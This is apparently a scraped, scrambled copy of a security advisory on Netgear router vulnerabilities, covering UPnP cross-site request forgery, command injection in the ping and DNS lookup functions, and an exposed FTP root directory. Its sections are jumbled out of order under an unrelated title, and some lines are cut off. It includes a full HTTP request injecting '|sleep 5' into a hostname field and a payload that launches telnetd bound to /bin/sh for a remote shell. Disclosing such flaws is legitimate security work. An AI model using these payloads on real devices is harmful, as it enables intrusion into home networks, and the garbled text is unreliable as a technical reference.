Error validating proxy id netgear

This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.

error validating proxy id netgear-30

Proof of concept ---------------- The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the Gear Dog backdoor (See issue 5). Port 23 is the internal port number and port 887 is the external port number to be opened.

The Gear Dog backdoor is a known remote access backdoor implemented in many Net Gear products. Solution -------- Ensure that UPNP requests sent through HTTP POST parameters are not honoured. Command Execution with Ping =============================== Requires -------- Authenticated access to the web administration interface.

For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.') 3.

Blind Command Execution with DNS Lookup =========================================== Requires -------- Authenticated access to the web administration interface.

Description ----------- The Universal Plug and Play (UPNP) implementation used by Net Gear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks.

This can be used to bypass or alter firewall rules.

Proof of concept ---------------- Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server: POST /HTTP/1.1 Host: 192.168.0.1 Proxy-Connection: keep-alive Content-Length: 32 Cache-Control: max-age=0 Authorization: Basic YWRta W46YXBwb GU3ODE= Origin: User-Agent: Mozilla/5.0 (X11; Linux x86_64) Apple Web Kit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Referer: gzip,deflate,sdch Accept-Language: en-GB,en-US;q=0.8,en;q=0.6 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 host_name=|sleep 5&lookup=Lookup To get an interactive shell, 1.

Send the following POST data: hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup 2.

If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function. FTP Insecure Root Directory =============================== Requires -------- FTP to be enabled (not enabled by default) Description ----------- The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP. ftp ls / 200 PORT 192.168.0.927 OK 150 BINARY data connection established.

It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'. -rw-r--r-- 1 nobody root 2 Jan 01 2003 all_no_password -rw-r--r-- 1 nobody root 1700 Jan 01 2003 drwxr-xr-x 3 nobody root 0 Jan 01 2003 conf -rw-r--r-- 1 nobody root 2 Jan 01 2003 lan3_time -r--r--r-- 1 nobody root 1430 Jan 01 2003 lan_dev -rw-r--r-- 1 nobody root 2 Jan 01 2003 lan_time drwxr-xr-x 48 nobody root 0 Jan 01 2003 mnt -rw-r--r-- 1 nobody root 1 Jan 01 2003 -rw-r--r-- 1 nobody root 0 Jan 01 2003 -rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns_drwxr-xr-x 2 nobody root 0 Jan 01 2003 ppp -rw-r--r-- 1 nobody root 38 Jan 01 2003 -rw-r--r-- 1 nobody root 208 Jan 01 2003 drwxr-xr-x 4 nobody root 0 Jan 01 2003 samba drwxr-xr-x 2 nobody root 0 Jan 01 2003 shares -rw-r--r-- 1 nobody root 262 Jan 01 2003 space_info -rw------- 1 nobody root 2 Oct 14 timesync -rw-r--r-- 1 nobody root 242 Jan 01 2003 -rw-r--r-- 1 nobody root 0 Jan 01 2003 udhcpd.leases -rw-r--r-- 1 nobody root 4 Jan 01 2003 -rw-r--r-- 1 nobody root 2 Jan 01 2003 udhcpd_-rw-r--r-- 1 nobody root 3562 Jan 01 2003 upnp_xml drwxr-xr-x 2 nobody root 0 Jan 01 2003 usb_vol_name drwxr-xr-x 11 nobody root 0 Jan 01 2003 var -r--r--r-- 1 nobody root 1922 Jan 01 2003 wan_dev -rw-r--r-- 1 nobody root 3 Jan 01 2003 wan_time drwxr-xr-x 2 nobody root 0 Jan 01 1999 wlan -rw-r--r-- 1 nobody root 2 Jan 01 2003 wlan_time -rw-r--r-- 1 nobody root 0 Jan 01 2003 226 Directory list has been submitted.

Description ----------- The DNS lookup function available through the web interface is vulnerable to operating system command injection.

Tags: , ,